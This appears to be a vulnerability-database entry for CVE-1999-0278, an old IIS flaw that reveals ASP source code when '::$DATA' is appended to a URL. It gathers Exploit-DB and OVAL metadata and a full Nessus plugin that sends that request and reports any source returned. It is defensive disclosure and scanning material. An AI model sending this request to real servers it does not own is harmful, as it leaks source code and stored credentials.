Vulnerabilities > CVE-1999-0278 - Unspecified vulnerability in Microsoft Internet Information Server and Windows NT

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
microsoft
nessus
exploit available

Summary

In IIS, remote attackers can obtain source code for ASP files by appending "::$DATA" to the URL.

Exploit-Db

descriptionMicrosoft IIS 3.0/4.0,Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability. CVE-1999-0278. Remote exploits for multiple platform
idEDB-ID:19118
last seen2016-02-02
modified1998-01-01
published1998-01-01
reporterPaul Ashton
sourcehttps://www.exploit-db.com/download/19118/
titleMicrosoft IIS 3.0/4.0,Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability

Nessus

NASL familyWeb Servers
NASL idASP_SOURCE_DATA.NASL
descriptionIt is possible to get the source code of a remote ASP script by appending
last seen2020-06-01
modified2020-06-02
plugin id10362
published2000-04-10
reporterThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10362
titleMicrosoft IIS ASP::$DATA ASP Source Disclosure
code
#
# This script was written by Renaud Deraison <[email protected]>
#
# See the Nessus Scripts License for details
#
#


include("compat.inc");

if(description)
{
 script_id(10362);
 script_version ("1.39");
 script_cvs_date("Date: 2018/11/15 20:50:25");

 script_cve_id("CVE-1999-0278");
 script_bugtraq_id(149);
 script_xref(name:"MSFT", value: "MS98-003");
 script_xref(name:"MSKB", value:"188806");

 script_name(english:"Microsoft IIS ASP::$DATA ASP Source Disclosure");
 script_summary(english:"downloads the source of ASP scripts");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by an information disclosure flaw." );
 script_set_attribute(attribute:"description", value:
"It is possible to get the source code of a remote ASP script by
appending '::$DATA' to the end of the request.  ASP source code may
contain sensitive information such as logins, passwords and server
information." );
 script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/1998/ms98-003" );
 script_set_attribute(attribute:"solution", value:
"Apply the hotfixes referenced in the vendor advisory above." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value: "2000/04/10");
 script_set_attribute(attribute:"vuln_publication_date", value: "1998/07/01");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

 script_category(ACT_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");
 script_family(english:"Web Servers");

 script_dependencies("find_service1.nasl", "webmirror.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl");
 script_require_ports("Services/www", 80);
 script_require_keys("www/ASP");
 exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80, asp:TRUE);

function check(file)
{
  local_var w, r, report;

  w = http_send_recv3(method:"GET",item:string(file, "::$DATA"), port:port, exit_on_fail:TRUE);
  r = strcat(w[0], w[1], '\r\n', w[2]);
  if(
    "Content-Type: application/octet-stream" >< r && 
    "<%" >< r && 
    "Bad Request" >!< r 
  )
  {
    if (report_verbosity > 0)
    {
      report = 
        '\n' + "Nessus was able to retrieve the source of '" + file + "' by sending" +
        '\nthe following request :' +
        '\n' +
        '\n  ' + build_url(port:port, qs:file+'::$DATA') + '\n';

      if (report_verbosity > 1)
      {
        report += 
          '\nHere it is :' +
          '\n' +
          '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + 
          '\n' + w[2] +
          crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n';
      }
      security_warning(port:port, extra:report);
    }
    else security_warning(port);
    return(1);
  }
  return(0);
}


if(check(file:"/default.asp"))exit(0);
files = get_kb_list(string("www/", port, "/content/extensions/asp"));
if(isnull(files))exit(0);
files = make_list(files);
check(file:files[0]); 

Oval

accepted2011-05-16T04:03:36.138-04:00
classvulnerability
contributors
  • nameChristine Walzer
    organizationThe MITRE Corporation
  • nameRobert L. Hollis
    organizationThreatGuard, Inc.
  • nameShane Shaffer
    organizationG2, Inc.
  • nameSudhir Gandhe
    organizationTelos
  • nameShane Shaffer
    organizationG2, Inc.
descriptionIn IIS, remote attackers can obtain source code for ASP files by appending "::$DATA" to the URL.
familywindows
idoval:org.mitre.oval:def:913
statusaccepted
submitted2004-05-04T12:00:00.000-04:00
titleIIS ASP Source Code Access Vulnerability
version33